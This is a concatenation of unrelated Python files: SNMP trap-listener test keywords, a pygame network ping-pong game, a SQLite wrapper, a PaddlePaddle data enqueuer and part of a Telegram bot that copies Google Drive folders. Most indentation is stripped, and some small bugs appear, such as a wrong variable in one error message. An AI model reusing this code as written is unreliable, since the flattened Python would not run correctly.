<authProtocol>: authProtocol e.g. 'usmHMACMD5AuthProtocol'
authProtocol(string) = An indication of whether messages sent on behalf of this USM user
can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
<privkey>: private key e.g. 'privkey1'
<privProtocol>: privProtocol e.g. 'usmDESPrivProtocol'
privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
Return: True or False
"""
status = True
wdesc = "Starting Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port', 'community', 'snmp_username',
'securityEngineId', 'authkey', 'privkey',
'authProtocol', 'privProtocol']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
community = snmp_param_dic.get('community', None)
username = snmp_param_dic.get('snmp_username', None)
securityEngineId = snmp_param_dic.get('securityEngineId', None)
privkey = snmp_param_dic.get('privkey', None)
authkey = snmp_param_dic.get('authkey', None)
authProtocol = snmp_param_dic.get('authProtocol', None)
privProtocol = snmp_param_dic.get('privProtocol', None)
engine = ws.get_asyncoredispatcher(port)
ntfrcv.NotificationReceiver(engine, ws.trap_decoder)
ws.data_repo.update({"custom_mib_path":custom_mib_path,
"load_mib_module":load_mib_module})
trap_listner_job = Thread(target=ws.create_trap_listner_job, args=(port, ))
trap_listner_job_start = Thread(target=ws.start_trap_listner_job, args=(port,))
trap_listner_job.daemon = True
trap_listner_job_start.daemon = True
trap_listner_job.start()
if community:
stats = ws.add_community(port, community)
status = status and stats
if username and securityEngineId:
stats = self.add_snmp_v3_user(port, username, securityEngineId,
authkey, privkey,
authProtocol, privProtocol)
status = status and stats
sleep(1)
trap_listner_job_start.start()
sleep(2)
Utils.testcase_Utils.report_substep_status(status)
return status
def stop_trap_listener(self, system_name):
"""
Stop Trap listener job
Argument:
system_name: Agent system name given in the data file.
:return: Binary True or False
"""
status = True
wdesc = "Stop Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
stop_list = Thread(target=ws.close_trap_listner_job, args=(port,))
stop_list.daemon = True
stop_list.start()
stop_list.join()
Utils.testcase_Utils.report_substep_status(status)
return status
def validate_trap(self, system_name, value, oid_string=None, match_oid_op_value_pair="no"):
"""
        This method will validate the received traps from an agent.
Argument:
1. system_name: Agent System name from the data file
            2. value: The trap information e.g. 'Administrative State Down'
3. oid_string: MIB string e.g. 'FSS-COMMON-LOG::fssTrapDescription.0'
            4. match_oid_op_value_pair: if set to 'yes' it will match both
                oid_string and value as a pair. Default value is 'no'
:return: Binary True or False
"""
stats = []
status = False
wdesc = "Validate the Received Trap Messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}".format(len(op_trap), agent_ip))
for temp_list in op_trap:
for items in temp_list[4:]:
if match_oid_op_value_pair.lower() == "no":
if value and value in items[1]:
testcase_Utils.pNote("Value# {} is present in: \n# {} = {}".format(value, items[0], items[1]))
stats.append(True)
break
elif oid_string and value:
if oid_string in items[0] and value in items[1]:
testcase_Utils.pNote("OID #{} and Value #{} is present in: \n# {} = {}".format(oid_string, value, items[0], items[1]))
stats.append(True)
break
if True in stats:
break
if True in stats:
break
else:
testcase_Utils.pNote("No Trap Received!", "error")
if True in stats:
status = True
else:
if value and oid_string:
testcase_Utils.pNote("OID #{} and Value #{} is NOT Present!".format(oid_string, value), "error")
else:
testcase_Utils.pNote("Value #{} is NOT present!".format(oid_string, value), "error")
Utils.testcase_Utils.report_substep_status(status)
return status
def show_received_traps(self, system_name):
"""
Retrieve the captured SNMP Trap messages and show them in the console.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "List out the trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
sleep(5)
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}".format(len(op_trap), agent_ip))
for temp_list in op_trap:
ticks = temp_list[0].get("time_stamp")
contextengineid = temp_list[1].get("contextEngineId")
snmpver = temp_list[2].get("SNMPVER")
securityname = temp_list[3].get("securityName")
testcase_Utils.pNote(" --------->>Notification message(Time Stamp:{})<<------- \n From: {}:\n "
"contextEngineId :{}\n SNMPVER :{}\n securityName: {}"
.format(ticks, agent_ip, contextengineid, snmpver, securityname))
testcase_Utils.pNote("--------------")
for items in temp_list[4:]:
testcase_Utils.pNote("{} = {}".format(items[0], items[1]))
else:
testcase_Utils.pNote("No Trap Received from {}!".format(agent_ip), "error")
status = False
Utils.testcase_Utils.report_substep_status(status)
return status
def browse_mib(self, mib_filepath, mib_filename, browse='yes'):
"""
Browse the MIB File/single or multiple
:param mib_filepath: Mib file path of the git url or abs file path
:param mib_filename: MIB file name
        :param browse: Default value is 'yes', which browses only the MIBs named in the mib_filename argument;
            if set to 'no', all MIBs in the given path are browsed
:return: True or False
"""
status = True
wdesc = "Browse the MIB File"
Utils.testcase_Utils.pSubStep(wdesc)
oid, label, suffix, mibView, mibBuilder = ws.get_first_node_name(mib_filepath, mib_filename)
temp_modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
while 1:
try:
modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
mibNode, = mibBuilder.importSymbols(modName, nodeDesc)
nodetype = re.search(r"([\w]+)\(", str(mibNode)).group(1)
if browse.lower() == 'yes':
if modName in mib_filename:
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % ('$$', nodetype, modName+'::'+nodeDesc+'.0', '.'.join(map(str,(oid)))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (nodetype, modName+'::'+nodeDesc, '.'.join(map(str,(oid)))))
elif browse.lower() == 'no' :
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % ('$$', nodetype, modName+'::'+nodeDesc+'.0', '.'.join(map(str,(oid)))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (nodetype, modName+'::'+nodeDesc, '.'.join(map(str,(oid)))))
oid, label, suffix = mibView.getNextNodeName(oid)
except error.SmiError:
break
Utils.testcase_Utils.report_substep_status(status)
return status
def clear_received_traps(self, system_name):
"""
Clear the captured SNMP Trap messages stored in the repository.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "Clear trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
agent_ip = socket.gethostbyname(agent_ip)
clear_val = []
ws.data_repo.update({"snmp_trap_messages_{}".format(agent_ip): clear_val})
Utils.testcase_Utils.report_substep_status(status)
return status
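# Illustrative sketch (not executed): these keywords are normally driven by the
# Warrior framework, but a direct call would look roughly like the following,
# assuming a hypothetical datafile system named "agent1" with <ip> and
# <snmp_port> configured:
#     actions = CommonSnmpActions()
#     status, output = actions.snmp_get(snmp_ver='2c', system_name='agent1',
#                                       oid_string='1.3.6.1.2.1.1.1.0',
#                                       communityname='public')
#     # output['agent1_result'] then holds the (name, value) pairs returned by the agent.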
|
pingpong.py
|
import socket
import os
import threading
import random
import sys
import pygame
class PingPongexception(Exception):
pass
class Server:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.PORT = 12000
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
def openServer(self):
server_address = (self.hostAddress, self.PORT)
try:
self.HOST.bind(server_address)
self.HOST.listen(1)
print("Server is open")
return 0
except IndexError:
print(server_address, "is not valid")
return 1
except OSError:
print(server_address, "is already in use")
return 2
class Client:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
self.IP=self.PORT=None
def connect(self):
while True:
self.IP = input("Address: ") # self.hostAddress
self.PORT = int(input("Port: ")) # self.PORT
try:
self.HOST.connect((self.IP, self.PORT))
print("Connected to", (self.IP, self.PORT))
break
except ConnectionRefusedError:
print(self.IP+':'+str(self.PORT), "refused to connect")
except IndexError:
print(self.IP+':'+str(self.PORT), "is not valid")
except OSError:
print(self.IP+':'+str(self.PORT), "is not valid")
def showInfo(port):
hostName = socket.gethostname()
hostAddress = socket.gethostbyname(hostName)
print("Host Name:", hostName, "\n-----------------------")
print("Your IP:", hostAddress)
print("Your PORT:", port, "\n-----------------------")
def CommandLine():
defaultport = 12000
if sys.platform=='win32':
os.system("cls")
else:
os.system("clear")
showInfo(defaultport)
def Prompt():
connection = Server()
while True:
command = input("pingpongshell> ")
if command == "openserver":
con=connection.openServer()
if con==0:
while True:
client, address = connection.HOST.accept()
if client: # if client connected
print("Connected by", address)
return connection.HOST, client
elif command == "connect":
connection = Client()
connection.connect()
return connection.HOST, False
elif command == "exit" or command == "quit":
res="The user exited the shell."
raise PingPongexception(res)
elif command == "help":
print("""Commands:
openserver - Opens a server
connect - Connects to an existing server
exit/quit - Exits the shell
help - Prints this help page
""")
else:
print("Command '" + command + """' not found
Type 'help' for help.""")
class Ball:
def __init__(self, surface):
self.radius = 10
self.interface = surface
self.WIDTH, self.HEIGHT = pygame.display.get_surface().get_size()
self.location = [self.WIDTH // 2, self.HEIGHT // 2]
step = 5
self.speed = [random.choice((step, -step)), random.choice((step, -step))]
self.player_point = 0
def isCollision(self, player, competitor, top, bottom, left, right):
if self.location[0] <= left + self.radius:
self.speed[0] = -self.speed[0]
elif self.location[0] >= right - self.radius:
self.speed[0] = -self.speed[0]
self.player_point += 1
elif self.location[1] <= top + self.radius or self.location[1] >= bottom - self.radius:
self.speed[1] = -self.speed[1]
elif self.location[0] <= player.location[0] + player.WIDTH + self.radius:
if player.location[1] <= self.location[1] <= player.location[1] + player.HEIGHT:
self.speed[0] = -self.speed[0]
elif self.location[0] >= competitor.location[0] - self.radius:
if competitor.location[1] <= self.location[1] <= competitor.location[1] + competitor.HEIGHT:
self.speed[0] = -self.speed[0]
def render(self):
WHITE = (255, 255, 255)
pygame.draw.circle(self.interface, WHITE, self.location, self.radius)
class Player:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [30, 30]
self.interface = surface
self.speed = 5
self.point = 0
self.reqhaserrors=0
def sendingRequest(self, host, ball_location):
try:
location = "%s %s %s %s" % (self.location[1], ball_location[0], ball_location[1], self.point)
host.sendall(location.encode("utf-8"))
except ConnectionResetError:
print("The competitor disconnected")
self.reqhaserrors=1
except ConnectionAbortedError:
print("The competitor has issues with their thread")
self.reqhaserrors=2
except BrokenPipeError:
print("The competitor disconnected")
self.reqhaserrors=1
except IndexError:
print("The competitor disconnected")
self.reqhaserrors=1
def render(self):
white= (255, 255, 255)
pygame.draw.rect(self.interface, white, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
class Competitor:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [970, 30]
self.interface = surface
self.speed = 5
self.ball_location = [10, 10]
self.point = 0
self.reqhaserrors=0
def handlingRequest(self, client):
try:
data_received = client.recv(128).decode("utf-8")
location = data_received.split()
self.location[1] = int(location[0])
self.ball_location[0] = 500 + (500 - int(location[1]))
self.ball_location[1] = int(location[2])
self.point = int(location[3])
except ConnectionResetError:
print("The competitor disconnected")
self.reqhaserrors=1
except ConnectionAbortedError:
print("The competitor has issues with their thread")
self.reqhaserrors=2
except BrokenPipeError:
print("The competitor disconnected")
self.reqhaserrors=1
except IndexError:
print("The competitor disconnected")
self.reqhaserrors=1
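    # Wire format note (illustration only): each frame the peer sends one
    # space-separated string "paddle_y ball_x ball_y point".  For example
    # "30 500 250 2" sets location[1]=30, the ball to (500 + (500 - 500), 250)
    # and point=2; the x coordinate is mirrored around 500 because each player
    # draws itself on the left of its own window.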
def render(self):
white = (255, 255, 255)
pygame.draw.rect(self.interface, white, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
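# Wire protocol note: Player.sendingRequest and Competitor.handlingRequest exchange a
# single space-separated UTF-8 string of four fields,
#     "<paddle_y> <ball_x> <ball_y> <points>"
# e.g. the illustrative payload "130 512 244 3" means the remote paddle is at y=130,
# the ball is at (512, 244) on the sender's 1000x500 screen, and the sender has 3
# points. The receiver mirrors the ball's x coordinate (500 + (500 - ball_x)) so each
# player sees the ball from their own side of the table.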
class PingPong:
init_dir=os.path.dirname(__file__)
def __init__(self):
self.WIDTH, self.HEIGHT = 1000, 500
self.screen = None
def scoreBoard(self, player_point, competitor_point):
GREY = (128, 128, 128)
MIDDLE = [self.WIDTH // 2, self.HEIGHT // 2]
player_point = str(player_point)
competitor_point = str(competitor_point)
font = os.path.join(PingPong.init_dir,"cour.ttf")
size = 48
render_font = pygame.font.Font(font, size)
renderPlayerPoint = render_font.render(player_point, True, GREY)
renderCompetitorPoint = render_font.render(competitor_point, True, GREY)
self.screen.blit(renderPlayerPoint, (MIDDLE[0] - 100, MIDDLE[1] - 25))
self.screen.blit(renderCompetitorPoint, (MIDDLE[0] + 50, MIDDLE[1] - 25))
def start(self):
pygame.init()
if sys.platform=='win32':
icon = pygame.image.load("icon.png")
else:
icon = pygame.image.load(os.path.join(PingPong.init_dir,"icon.png"))
pygame.display.set_icon(icon)
frame = pygame.time.Clock()
FPS = 60
host, server = Prompt()
self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
if server: # server
pygame.display.set_caption("Ping Pong ! Server")
host = server
else: # client
pygame.display.set_caption("Ping Pong ! Client")
gameOver = False
player = Player(self.screen)
competitor = Competitor(self.screen)
ball = Ball(self.screen)
BLACK = (0, 0, 0)
TOP, BOTTOM, LEFT, RIGHT = 0, self.HEIGHT, 0, self.WIDTH
while not gameOver:
self.screen.fill(BLACK)
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOver = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameOver = True
# player moving
moving = pygame.key.get_pressed()
if moving[pygame.K_w] or moving[pygame.K_a] or moving[pygame.K_UP] or moving[pygame.K_RIGHT]:
player.location[1] -= player.speed
elif moving[pygame.K_s] or moving[pygame.K_d] or moving[pygame.K_DOWN] or moving[pygame.K_LEFT]:
player.location[1] += player.speed
if player.location[1] <= TOP:
player.location[1] = TOP
elif player.location[1] >= BOTTOM - player.HEIGHT:
player.location[1] = BOTTOM - player.HEIGHT
            # the server owns the ball physics
if server:
                # advance the ball; collision handling runs in the thread below
ball.location[0] += ball.speed[0]
ball.location[1] += ball.speed[1]
else:
ball.location = competitor.ball_location
ball_parameters = (player, competitor, TOP, BOTTOM, LEFT, RIGHT)
ball_collision = threading.Thread(target=ball.isCollision, args=ball_parameters)
handling = threading.Thread(target=competitor.handlingRequest, args=(host,))
sending = threading.Thread(target=player.sendingRequest, args=(host, ball.location))
handling.start()
sending.start()
ball_collision.start()
if (competitor.reqhaserrors or player.reqhaserrors):
break
player.point = ball.player_point
self.scoreBoard(player.point, competitor.point)
ball.render()
player.render()
competitor.render()
frame.tick(FPS)
pygame.display.update()
host.close()
pygame.quit()
if __name__ == "__main__":
n=PingPong()
CommandLine()
while True:
n.start()
|
utils.py
|
import functools
import threading
def run_in_thread(fn):
    """Decorator: run the wrapped callable on a new thread and return immediately."""
    @functools.wraps(fn)
    def run(*k, **kw):
        t = threading.Thread(target=fn, args=k, kwargs=kw)
        t.start()
    return run
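# A minimal usage sketch (the function name and timings below are illustrative): a
# decorated call returns immediately while the work runs on its own thread.
if __name__ == "__main__":
    import time
    @run_in_thread
    def slow_greeting(name, delay=0.1):
        time.sleep(delay)  # simulate slow work
        print("hello from", name)
    slow_greeting("a background thread")  # returns right away
    print("main thread is not blocked")
    time.sleep(0.2)  # give the worker time to finish before the interpreter exits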
|
db.py
|
import functools
import sqlite3
import threading
from threading import Thread
from typing import Callable, Dict, Union
from util.types import Function
class Database(object):
"""Database wrapper."""
    def __init__(self, path, debug=False):
        # type: (str, bool) -> None
self.path = path
self.conn = sqlite3.connect(path, check_same_thread=False)
# multithreading is only safe when Database.lock() is used
self.cursor = self.conn.cursor()
self._lock = threading.Lock()
self.debug = debug
@staticmethod
def sanitize(s):
# type: (str) -> str
return '"{}"'.format(s.replace("'", "''").replace('"', '""'))
@staticmethod
def desanitize(s):
# type: (str) -> str
return s.replace("''", "'").replace('""', '"').strip('"')
def table_exists(self, table_name):
# type: (str) -> bool
        query = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name=?"
return self.cursor.execute(query, [Database.desanitize(table_name)]).fetchone()[0] > 0
def result_exists(self):
return self.cursor.fetchone() is not None
def max_rowid(self, table):
# type: (str) -> int
query = 'SELECT max(ROWID) FROM {}'.format(table)
return self.cursor.execute(query).fetchone()[0]
def commit(self):
# type: () -> None
self.conn.commit()
def hard_close(self):
# type: () -> None
self.conn.close()
def close(self):
# type: () -> None
self.commit()
self.hard_close()
def lock(self):
# type: () -> None
self._lock.acquire()
def release_lock(self):
# type: () -> None
self._lock.release()
def __enter__(self):
# type: () -> Database
self.lock()
return self
def __exit__(self, exc_type, exc_value, traceback):
# type: () -> None
self.release_lock()
def reset_connection(self):
self.conn = sqlite3.connect(self.path)
self.cursor = self.conn.cursor()
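# Usage sketch (illustrative, not part of the original module): the lock taken by
# __enter__/__exit__ is what makes cross-thread use safe, so callers should go through
# the context manager, e.g.
#     db = Database("example.db")   # hypothetical path
#     with db:                      # acquires the internal lock
#         db.cursor.execute("CREATE TABLE IF NOT EXISTS kv (k TEXT, v TEXT)")
#         db.commit()
#     db.close()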
class ApplicationDatabaseException(Exception):
pass
class ApplicationDatabase(object):
"""
    `Database` wrapper for an application's DB-API.
Intended to be extended for a specific application.
:ivar name: name of database
:type name: str
:ivar db: low level database object
:type db: Database
    :ivar schema: SQL DB schema
:type schema: Dict[str, str]
:ivar exception: Exception class used by DB
:type exception: type(ApplicationDatabaseException)
"""
def __init__(self, schema, path, exception=ApplicationDatabaseException):
        # type: (Dict[str, str], Union[str, unicode], type) -> None
"""Create DB with given name and open low level connection through `Database`"""
self.name = path
self.schema = schema
        self.exception = exception  # type: type
self.db = Database(path)
self._create_tables()
def commit(self):
# type: () -> None
"""Commit DB."""
self.db.commit()
def hard_close(self):
# type: () -> None
"""Close DB without committing."""
self.db.hard_close()
def close(self):
# type: () -> None
"""Close and commit DB."""
self.commit()
self.db.hard_close()
def lock(self):
# type: () -> None
"""Acquire reentrant lock. By locking, multithreaded to DB is safe."""
self.db.lock()
def release_lock(self):
# type: () -> None
"""Release reentrant lock."""
self.db.release_lock()
def __enter__(self):
# type: () -> ApplicationDatabase
"""Enter DB (lock) when entering with statement."""
self.db.__enter__()
return self
def __exit__(self, exc_type, exc_value, traceback):
# type: () -> None
"""Exit DB (release lock) after with statement."""
self.db.__exit__(exc_type, exc_value, traceback)
def _create_tables(self):
# type: () -> None
"""Create all tables according to `DB_SCHEMA`."""
        for statement in self.schema.values():
            self.db.cursor.execute(statement)
self.db.commit()
def clear(self):
# type: () -> None
"""Drop and recreate tables."""
# noinspection SqlNoDataSourceInspection
self.db.cursor.executescript(
''.join('DROP TABLE {};'.format(table) for table in self.schema))
self._create_tables()
self.commit()
def reset_connection(self):
self.db.reset_connection()
def run_in_background(self, runnable, name=None):
# type: (Function, str) -> None
"""Run `runnable` in another thread, locking on this DB."""
        if name is None:
            name = runnable.__name__
        else:
            runnable.__name__ = name
print(threading.current_thread())
@functools.wraps(runnable)
def locking_wrapper():
print('{} is waiting to run in the background'.format(name))
print(threading.current_thread())
with self:
print('{} is running in the background'.format(name))
runnable()
print('{} is done running in the background'.format(name))
thread = Thread(target=locking_wrapper)
thread.background = True
thread.start()
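# Illustrative usage sketch (the schema, file name and callable below are hypothetical,
# not taken from any real application):
if __name__ == "__main__":
    DEMO_SCHEMA = {
        "notes": "CREATE TABLE IF NOT EXISTS notes (id INTEGER PRIMARY KEY, body TEXT)",
    }
    demo_db = ApplicationDatabase(DEMO_SCHEMA, "demo.db")
    def add_note():
        demo_db.db.cursor.execute("INSERT INTO notes (body) VALUES ('hello')")
        demo_db.commit()
    # run_in_background acquires the shared lock before invoking the callable
    demo_db.run_in_background(add_note, name="add_note")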
|
data_utils.py
|
# coding: utf8
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This code is based on https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
"""
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer(object):
"""
Multiple generators
Args:
generators:
wait_time (float): time to sleep in-between calls to `put()`.
"""
def __init__(self, generators, wait_time=0.05):
self.wait_time = wait_time
self._generators = generators
self._threads = []
self._stop_events = []
self.queue = None
self._manager = None
self.workers = 1
def start(self, workers=1, max_queue_size=16):
"""
Start worker threads which add data from the generator into the queue.
Args:
workers (int): number of worker threads
max_queue_size (int): queue size
(when full, threads could block on `put()`)
"""
self.workers = workers
def data_generator_task(pid):
"""
Data generator task.
"""
def task(pid):
if (self.queue is not None
and self.queue.qsize() < max_queue_size):
generator_output = next(self._generators[pid])
self.queue.put((generator_output))
else:
time.sleep(self.wait_time)
while not self._stop_events[pid].is_set():
try:
task(pid)
except Exception:
self._stop_events[pid].set()
break
try:
self._manager = multiprocessing.Manager()
self.queue = self._manager.Queue(maxsize=max_queue_size)
for pid in range(self.workers):
self._stop_events.append(multiprocessing.Event())
thread = multiprocessing.Process(
target=data_generator_task, args=(pid, ))
thread.daemon = True
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
"""
Returns:
            bool: Whether the worker processes are running.
"""
        # If the queue is not empty, we are still running; wait for a consumer
if not self.queue.empty():
return True
for pid in range(self.workers):
if not self._stop_events[pid].is_set():
return True
return False
def stop(self, timeout=None):
"""
        Stop the running worker processes and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout(int|None): maximum time to wait on `thread.join()`.
"""
if self.is_running():
for pid in range(self.workers):
self._stop_events[pid].set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
if self._manager:
self._manager.shutdown()
self._threads = []
self._stop_events = []
self.queue = None
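# Minimal usage sketch (illustrative only; assumes a fork-based multiprocessing start
# method such as the Linux default, since the worker closure and the generators are
# inherited by the child processes rather than pickled):
if __name__ == "__main__":
    def make_generator(offset):
        while True:
            yield np.arange(4) + offset
    enqueuer = GeneratorEnqueuer([make_generator(0), make_generator(100)])
    enqueuer.start(workers=2, max_queue_size=8)
    try:
        for _ in range(4):
            while enqueuer.queue.empty():
                time.sleep(0.05)
            print(enqueuer.queue.get())
    finally:
        enqueuer.stop()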
|
iCopy.py
|
import time, logging, re, chardet
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from telegram.ext.dispatcher import run_async
import utils
from utils import (
folder_name,
sendmsg,
restricted,
menu_keyboard,
run,
start_message,
help_message,
mode_message,
task_message,
cplt_message,
pros_message,
cron_task,
killmission,
kill_message,
Mission_Done,
Mission_kill,
kill_message_info,
_get_ver
)
from drive import drive_get
from threading import Timer, Thread
import settings
from process_bar import status
# ############################## Program Description ##############################
# Author : 'FxxkrLab',
# Website: 'https://bbs.jsu.net/c/official-project/icopy/6',
# Code_URL : 'https://github.com/fxxkrlab/iCopy',
# Description= 'Copy GoogleDrive Resources via Telegram BOT',
# Programming Language : Python3',
# License : MIT License',
# Operating System : Linux',
# ############################## Program Description.END ###########################
_Version = 'v0.1.7-beta.3'
# ############################## logging ##############################
# Logging.basicConfig()
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO,
)
logger = logging.getLogger(__name__)
# ############################## Global ##############################
# Conversation Stats
CHOOSE_MODE, LINK_REPLY, TARGET_REPLY = range(3)
# Regex
regex = r"[-\w]{11,33}"
# ############################## Command ##############################
# START INFO & InlineKeyboard with Callback_query.data
@restricted
def start(update, context):
update.effective_message.reply_text(
start_message().format(update.effective_user.first_name),
reply_markup=menu_keyboard(),
)
return CHOOSE_MODE
# HELP: command help prompt and guidance
@restricted
def help(update, context):
update.effective_message.reply_text(help_message())
# ############################## Run_Modes ##############################
# QUICK Mode ,set mode = quick
@restricted
def quick(update, context):
global mode
mode = "quick"
call_mode = update.effective_message.text
if "/quick" == call_mode.strip()[:6]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
if update.callback_query.data == "quick":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋极速转存┋")
)
return request_link(update, context)
# COPY Mode ,set mode = copy
@restricted
def copy(update, context):
global mode
mode = "copy"
call_mode = update.effective_message.text
if "/copy" == call_mode.strip()[:5]:
update.effective_message.reply_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
if update.callback_query.data == "copy":
update.callback_query.edit_message_text(
mode_message().format(update.effective_user.first_name, "┋自定义目录┋")
)
return request_link(update, context)
# ############################## Run_Modes.END ##############################
# Error module
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
# cancel function
def cancel(update, context):
user = update.message.from_user
logger.info("User %s canceled the conversation.", user.first_name)
update.message.reply_text(
"Bye! {} , 欢迎再次使用 iCopy".format(update.message.from_user.first_name)
)
return ConversationHandler.END
# kill function
def kill(update, context):
Thread(target=killmission).start()
return cancel(update, context)
# version
def _version(update, context):
update.message.reply_text(
"Welcome to use iCopy-Bot\n"
"Current Version : {}\n"
"Latest Version : {}".format(_Version, _get_ver())
)
# ################################ Service #################################
# Request GoogleDrive Shared_Link
def request_link(update, context):
update.effective_message.reply_text("请输入 Google Drive 分享链接")
return LINK_REPLY
# Get Shared_link & request Target_Link
def request_target(update, context):
global mode
global link
link = update.effective_message.text
if "/cancel" == link.strip()[:7]:
return cancel(update, context)
if "quick" == mode:
return recived_mission(update, context)
if "copy" == mode:
update.effective_message.reply_text("请输入转入目标文件夹链接 ")
return TARGET_REPLY
# Get Target_Link (also covers Shared_link) & run the command determined by mode
def recived_mission(update, context):
global mode
global link
global target
target = update.effective_message.text
if "/cancel" == target.strip()[:7]:
return cancel(update, context)
# extract lid,tid from Link(shared & Target)
lid = "".join(re.findall(regex, link))
tid = "".join(re.findall(regex, target))
# extract Shared_Link folderName
if len(lid) == 28 or len(lid) == 33:
foldername = folder_name(settings.Remote, lid, lid)
elif len(lid) != 28 and len(lid) != 33:
d_id = lid
foldername = drive_get(d_id)['name']
# get Target_folderName under quick mode
if "quick" == mode:
# tid = Pre_Dst_id under quick mode
tid = settings.Pre_Dst_id
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
elif len(tid) != 28 and len(tid) != 33:
d_id = tid
target_folder = drive_get(d_id)['name']
# get Target_folderName under copy mode
elif "copy" == mode:
if len(tid) == 28 or len(tid) == 33:
target_folder = folder_name(settings.Remote, tid, tid)
elif len(tid) != 28 and len(tid) != 33:
d_id = tid
target_folder = drive_get(d_id)['name']
# sendmsg Mission.INFO
update.effective_message.reply_text(
task_message().format(foldername, lid, target_folder, foldername)
)
# Build Mission Command
commandstr = """{}' JSUSPLIT 'copy' JSUSPLIT '{}:{{{}}}' JSUSPLIT '{}:{{{}}}/{}' JSUSPLIT '{}' JSUSPLIT '{}' JSUSPLIT '{}""".format(
settings.Clone,
settings.Remote,
lid,
settings.Remote,
tid,
foldername,
settings.Run_Mode,
settings.TRANSFER,
settings.CHECKERS,
)
command = commandstr.split("' JSUSPLIT '")
#print(command)
return ConversationHandler.END, copyprocess(update, context, command)
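# Note on the command built above: "' JSUSPLIT '" is only a delimiter, so after the
# final split() the list handed to run() looks roughly like (values illustrative):
#     [<Clone binary>, 'copy', '<Remote>:{<source folder id>}',
#      '<Remote>:{<target folder id>}/<folder name>', <Run_Mode>, <TRANSFER>, <CHECKERS>]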
# Read and process task progress info, and push rolling status updates to the BOT UI via an async process
@run_async
def copyprocess(update, context, command):
bot = context.bot
message = update.effective_message.reply_text("转存任务准备中...")
mid = message.message_id
percent = ""
percent1 = ""
fps = ""
working = ""
working1 = ""
prog = ""
timeout = 0.1
xtime = 0
for toutput in run(command):
print(toutput.decode("utf-8", "ignore"))
